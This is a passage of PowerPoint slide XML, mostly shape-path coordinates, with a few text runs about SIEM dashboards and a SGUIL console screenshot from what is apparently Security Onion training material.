                    <a:pt x="22990" y="1421707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32894" y="1466736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44482" y="1511109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57721" y="1554790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72574" y="1597745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89006" y="1639936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106981" y="1681329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126465" y="1721889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147421" y="1761579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169815" y="1800364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193609" y="1838210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218770" y="1875079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245262" y="1910938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273048" y="1945750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302094" y="1979479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332365" y="2012091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363824" y="2043550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396436" y="2073821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430165" y="2102867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464977" y="2130653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500836" y="2157145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537705" y="2182306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575551" y="2206100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614336" y="2228494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654026" y="2249450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694586" y="2268934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735979" y="2286909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778170" y="2303341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821125" y="2318194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864806" y="2331433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909179" y="2343021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="954208" y="2352925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999859" y="2361107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046094" y="2367532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092879" y="2372166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140179" y="2374972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187958" y="2375916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1235736" y="2374972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283036" y="2372166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329821" y="2367532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1376056" y="2361107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421707" y="2352925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466736" y="2343021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511109" y="2331433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554790" y="2318194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597745" y="2303341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1639936" y="2286909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1681329" y="2268934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721889" y="2249450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761579" y="2228494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1800364" y="2206100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838210" y="2182306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1875079" y="2157145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910938" y="2130653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1945750" y="2102867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1979479" y="2073821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2012091" y="2043550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2043550" y="2012091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2073821" y="1979479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2102867" y="1945750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2130653" y="1910938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157145" y="1875079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2182306" y="1838210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2206100" y="1800364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2228494" y="1761579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2249450" y="1721889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2268934" y="1681329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2286909" y="1639936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303341" y="1597745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2318194" y="1554790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2331433" y="1511109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2343021" y="1466736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352925" y="1421707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2361107" y="1376056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367532" y="1329821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372166" y="1283036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2374972" y="1235736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2375916" y="1187958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2374972" y="1140179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372166" y="1092879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367532" y="1046094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2361107" y="999859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352925" y="954208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2343021" y="909179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2331433" y="864806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2318194" y="821125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303341" y="778170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2286909" y="735979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2268934" y="694586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2249450" y="654026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2228494" y="614336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2206100" y="575551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2182306" y="537705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157145" y="500836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2130653" y="464977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2102867" y="430165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2073821" y="396436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2043550" y="363824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2012091" y="332365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1979479" y="302094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1945750" y="273048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910938" y="245262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1875079" y="218770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838210" y="193609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1800364" y="169815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761579" y="147421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721889" y="126465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1681329" y="106981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1639936" y="89006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597745" y="72574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554790" y="57721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511109" y="44482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466736" y="32894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421707" y="22990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1376056" y="14808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329821" y="8383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283036" y="3749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1235736" y="943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187958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989326" y="4536185"/>
              <a:ext cx="2376170" cy="2376170"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2376170" h="2376170">
                  <a:moveTo>
                    <a:pt x="0" y="1187958"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="943" y="1140179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3749" y="1092879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8383" y="1046094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14808" y="999859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22990" y="954208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32894" y="909179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44482" y="864806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57721" y="821125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72574" y="778170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89006" y="735979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106981" y="694586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126465" y="654026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147421" y="614336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169815" y="575551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193609" y="537705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218770" y="500836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245262" y="464977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273048" y="430165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302094" y="396436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332365" y="363824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363824" y="332365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396436" y="302094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430165" y="273048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464977" y="245262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500836" y="218770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537705" y="193609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575551" y="169815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614336" y="147421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654026" y="126465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694586" y="106981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735979" y="89006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778170" y="72574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821125" y="57721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864806" y="44482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909179" y="32894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="954208" y="22990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999859" y="14808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046094" y="8383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092879" y="3749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140179" y="943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187958" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1235736" y="943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283036" y="3749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329821" y="8383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1376056" y="14808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421707" y="22990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466736" y="32894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511109" y="44482"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554790" y="57721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597745" y="72574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1639936" y="89006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1681329" y="106981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721889" y="126465"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761579" y="147421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1800364" y="169815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838210" y="193609"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1875079" y="218770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910938" y="245262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1945750" y="273048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1979479" y="302094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2012091" y="332365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2043550" y="363824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2073821" y="396436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2102867" y="430165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2130653" y="464977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157145" y="500836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2182306" y="537705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2206100" y="575551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2228494" y="614336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2249450" y="654026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2268934" y="694586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2286909" y="735979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303341" y="778170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2318194" y="821125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2331433" y="864806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2343021" y="909179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352925" y="954208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2361107" y="999859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367532" y="1046094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372166" y="1092879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2374972" y="1140179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2375916" y="1187958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2374972" y="1235736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2372166" y="1283036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367532" y="1329821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2361107" y="1376056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352925" y="1421707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2343021" y="1466736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2331433" y="1511109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2318194" y="1554790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2303341" y="1597745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2286909" y="1639936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2268934" y="1681329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2249450" y="1721889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2228494" y="1761579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2206100" y="1800364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2182306" y="1838210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2157145" y="1875079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2130653" y="1910938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2102867" y="1945750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2073821" y="1979479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2043550" y="2012091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2012091" y="2043550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1979479" y="2073821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1945750" y="2102867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1910938" y="2130653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1875079" y="2157145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1838210" y="2182306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1800364" y="2206100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1761579" y="2228494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721889" y="2249450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1681329" y="2268934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1639936" y="2286909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1597745" y="2303341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1554790" y="2318194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1511109" y="2331433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466736" y="2343021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1421707" y="2352925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1376056" y="2361107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1329821" y="2367532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283036" y="2372166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1235736" y="2374972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1187958" y="2375916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1140179" y="2374972"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092879" y="2372166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1046094" y="2367532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="999859" y="2361107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="954208" y="2352925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="909179" y="2343021"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864806" y="2331433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="821125" y="2318194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="778170" y="2303341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735979" y="2286909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="694586" y="2268934"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="654026" y="2249450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614336" y="2228494"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575551" y="2206100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537705" y="2182306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500836" y="2157145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464977" y="2130653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430165" y="2102867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396436" y="2073821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="363824" y="2043550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332365" y="2012091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302094" y="1979479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273048" y="1945750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245262" y="1910938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218770" y="1875079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193609" y="1838210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169815" y="1800364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147421" y="1761579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126465" y="1721889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106981" y="1681329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89006" y="1639936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72574" y="1597745"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57721" y="1554790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44482" y="1511109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32894" y="1466736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22990" y="1421707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14808" y="1376056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8383" y="1329821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3749" y="1283036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="943" y="1235736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1187958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23260" y="4747259"/>
              <a:ext cx="1905000" cy="1905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92316" y="306451"/>
            <a:ext cx="30714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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SIEM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="165">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dashboards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96940" y="760476"/>
            <a:ext cx="4247388" cy="3657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91355" y="2802635"/>
            <a:ext cx="8513064" cy="521665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171569" y="1933193"/>
            <a:ext cx="7909559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Below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a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screenshot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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>SGUIL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console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onion.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66585" y="3397250"/>
            <a:ext cx="7840980" cy="4646295"/>
            <a:chOff x="6466585" y="3397250"/>
            <a:chExt cx="7840980" cy="4646295"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6479285" y="3409950"/>
              <a:ext cx="3375660" cy="1358265"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3375659" h="1358264">
                  <a:moveTo>
                    <a:pt x="0" y="226313"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4598" y="180710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17787" y="138231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38656" y="99789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66293" y="66294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99789" y="38656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138231" y="17787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180710" y="4598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226313" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3149345" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3194949" y="4598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3237428" y="17787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275870" y="38656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3309366" y="66294"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3337003" y="99789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3357872" y="138231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3371061" y="180710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3375660" y="226313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3375660" y="1131570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3371061" y="1177173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3357872" y="1219652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3337003" y="1258094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3309365" y="1291589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275870" y="1319227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3237428" y="1340096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3194949" y="1353285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3149345" y="1357884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226313" y="1357884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180710" y="1353285"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138231" y="1340096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99789" y="1319227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66293" y="1291589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38656" y="1258094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17787" y="1219652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4598" y="1177173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1131570"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="226313"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="E3B36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408157" y="6512814"/>
              <a:ext cx="3886200" cy="1518285"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
